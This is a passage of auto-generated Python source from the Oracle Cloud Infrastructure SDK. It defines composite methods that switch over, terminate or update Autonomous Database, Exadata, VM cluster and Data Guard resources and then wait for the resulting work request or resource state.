Calls :py:func:`~oci.database.DatabaseClient.switchover_autonomous_database` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.switchover_autonomous_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.switchover_autonomous_database(autonomous_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def switchover_autonomous_database_and_wait_for_state(self, autonomous_database_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.switchover_autonomous_database` and waits for the :py:class:`~oci.database.models.AutonomousDatabase` acted upon
to enter the given state(s).
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.AutonomousDatabase.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.switchover_autonomous_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.switchover_autonomous_database(autonomous_database_id, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_autonomous_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def switchover_data_guard_association_and_wait_for_work_request(self, database_id, data_guard_association_id, switchover_data_guard_association_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.switchover_data_guard_association` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str data_guard_association_id: (required)
The Data Guard association's `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.SwitchoverDataGuardAssociationDetails switchover_data_guard_association_details: (required)
Request to swtichover a primary to a standby.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.switchover_data_guard_association`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.switchover_data_guard_association(database_id, data_guard_association_id, switchover_data_guard_association_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def switchover_data_guard_association_and_wait_for_state(self, database_id, data_guard_association_id, switchover_data_guard_association_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.switchover_data_guard_association` and waits for the :py:class:`~oci.database.models.DataGuardAssociation` acted upon
to enter the given state(s).
:param str database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str data_guard_association_id: (required)
The Data Guard association's `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.SwitchoverDataGuardAssociationDetails switchover_data_guard_association_details: (required)
Request to swtichover a primary to a standby.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.DataGuardAssociation.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.switchover_data_guard_association`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.switchover_data_guard_association(database_id, data_guard_association_id, switchover_data_guard_association_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_data_guard_association(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def terminate_autonomous_container_database_and_wait_for_work_request(self, autonomous_container_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.terminate_autonomous_container_database` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_container_database_id: (required)
The Autonomous Container Database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.terminate_autonomous_container_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.terminate_autonomous_container_database(autonomous_container_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def terminate_autonomous_exadata_infrastructure_and_wait_for_work_request(self, autonomous_exadata_infrastructure_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.terminate_autonomous_exadata_infrastructure` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_exadata_infrastructure_id: (required)
The Autonomous Exadata Infrastructure `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.terminate_autonomous_exadata_infrastructure`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.terminate_autonomous_exadata_infrastructure(autonomous_exadata_infrastructure_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def terminate_db_system_and_wait_for_work_request(self, db_system_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.terminate_db_system` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str db_system_id: (required)
The DB system `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.terminate_db_system`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.terminate_db_system(db_system_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_autonomous_container_database_and_wait_for_work_request(self, autonomous_container_database_id, update_autonomous_container_database_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_autonomous_container_database` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_container_database_id: (required)
The Autonomous Container Database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateAutonomousContainerDatabaseDetails update_autonomous_container_database_details: (required)
Request to update the properties of an Autonomous Container Database.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_autonomous_container_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_autonomous_container_database(autonomous_container_database_id, update_autonomous_container_database_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_autonomous_container_database_and_wait_for_state(self, autonomous_container_database_id, update_autonomous_container_database_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_autonomous_container_database` and waits for the :py:class:`~oci.database.models.AutonomousContainerDatabase` acted upon
to enter the given state(s).
:param str autonomous_container_database_id: (required)
The Autonomous Container Database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateAutonomousContainerDatabaseDetails update_autonomous_container_database_details: (required)
Request to update the properties of an Autonomous Container Database.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.AutonomousContainerDatabase.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_autonomous_container_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_autonomous_container_database(autonomous_container_database_id, update_autonomous_container_database_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_autonomous_container_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_autonomous_database_and_wait_for_work_request(self, autonomous_database_id, update_autonomous_database_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_autonomous_database` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateAutonomousDatabaseDetails update_autonomous_database_details: (required)
Request to update the properties of an Autonomous Database.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_autonomous_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_autonomous_database(autonomous_database_id, update_autonomous_database_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_autonomous_database_and_wait_for_state(self, autonomous_database_id, update_autonomous_database_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_autonomous_database` and waits for the :py:class:`~oci.database.models.AutonomousDatabase` acted upon
to enter the given state(s).
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateAutonomousDatabaseDetails update_autonomous_database_details: (required)
Request to update the properties of an Autonomous Database.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.AutonomousDatabase.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_autonomous_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_autonomous_database(autonomous_database_id, update_autonomous_database_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_autonomous_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_autonomous_database_regional_wallet_and_wait_for_work_request(self, update_autonomous_database_wallet_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_autonomous_database_regional_wallet` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.UpdateAutonomousDatabaseWalletDetails update_autonomous_database_wallet_details: (required)
Request to update the properties of Autonomous Database regional wallet.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_autonomous_database_regional_wallet`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_autonomous_database_regional_wallet(update_autonomous_database_wallet_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_autonomous_database_wallet_and_wait_for_work_request(self, autonomous_database_id, update_autonomous_database_wallet_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_autonomous_database_wallet` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateAutonomousDatabaseWalletDetails update_autonomous_database_wallet_details: (required)
Request to update the properties of an Autonomous Database wallet.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_autonomous_database_wallet`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_autonomous_database_wallet(autonomous_database_id, update_autonomous_database_wallet_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_autonomous_exadata_infrastructure_and_wait_for_work_request(self, autonomous_exadata_infrastructure_id, update_autonomous_exadata_infrastructures_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_autonomous_exadata_infrastructure` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_exadata_infrastructure_id: (required)
The Autonomous Exadata Infrastructure `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateAutonomousExadataInfrastructureDetails update_autonomous_exadata_infrastructures_details: (required)
Request to update the properties of a Autonomous Exadata Infrastructure.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_autonomous_exadata_infrastructure`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_autonomous_exadata_infrastructure(autonomous_exadata_infrastructure_id, update_autonomous_exadata_infrastructures_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_autonomous_exadata_infrastructure_and_wait_for_state(self, autonomous_exadata_infrastructure_id, update_autonomous_exadata_infrastructures_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_autonomous_exadata_infrastructure` and waits for the :py:class:`~oci.database.models.AutonomousExadataInfrastructure` acted upon
to enter the given state(s).
:param str autonomous_exadata_infrastructure_id: (required)
The Autonomous Exadata Infrastructure `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateAutonomousExadataInfrastructureDetails update_autonomous_exadata_infrastructures_details: (required)
Request to update the properties of a Autonomous Exadata Infrastructure.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.AutonomousExadataInfrastructure.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_autonomous_exadata_infrastructure`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_autonomous_exadata_infrastructure(autonomous_exadata_infrastructure_id, update_autonomous_exadata_infrastructures_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_autonomous_exadata_infrastructure(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_autonomous_vm_cluster_and_wait_for_work_request(self, autonomous_vm_cluster_id, update_autonomous_vm_cluster_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_autonomous_vm_cluster` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_vm_cluster_id: (required)
The autonomous VM cluster `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateAutonomousVmClusterDetails update_autonomous_vm_cluster_details: (required)
Request to update the attributes of an Autonomous VM cluster.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_autonomous_vm_cluster`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_autonomous_vm_cluster(autonomous_vm_cluster_id, update_autonomous_vm_cluster_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_autonomous_vm_cluster_and_wait_for_state(self, autonomous_vm_cluster_id, update_autonomous_vm_cluster_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_autonomous_vm_cluster` and waits for the :py:class:`~oci.database.models.AutonomousVmCluster` acted upon
to enter the given state(s).
:param str autonomous_vm_cluster_id: (required)
The autonomous VM cluster `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateAutonomousVmClusterDetails update_autonomous_vm_cluster_details: (required)
Request to update the attributes of an Autonomous VM cluster.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.AutonomousVmCluster.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_autonomous_vm_cluster`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_autonomous_vm_cluster(autonomous_vm_cluster_id, update_autonomous_vm_cluster_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_autonomous_vm_cluster(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_backup_destination_and_wait_for_state(self, backup_destination_id, update_backup_destination_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_backup_destination` and waits for the :py:class:`~oci.database.models.BackupDestination` acted upon
to enter the given state(s).
:param str backup_destination_id: (required)
The `OCID`__ of the backup destination.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateBackupDestinationDetails update_backup_destination_details: (required)
For a RECOVERY_APPLIANCE backup destination, request to update the connection string and/or the list of VPC users.
For an NFS backup destination, request to update the NFS location.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.BackupDestination.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_backup_destination`
:param dict waiter_kwargs:
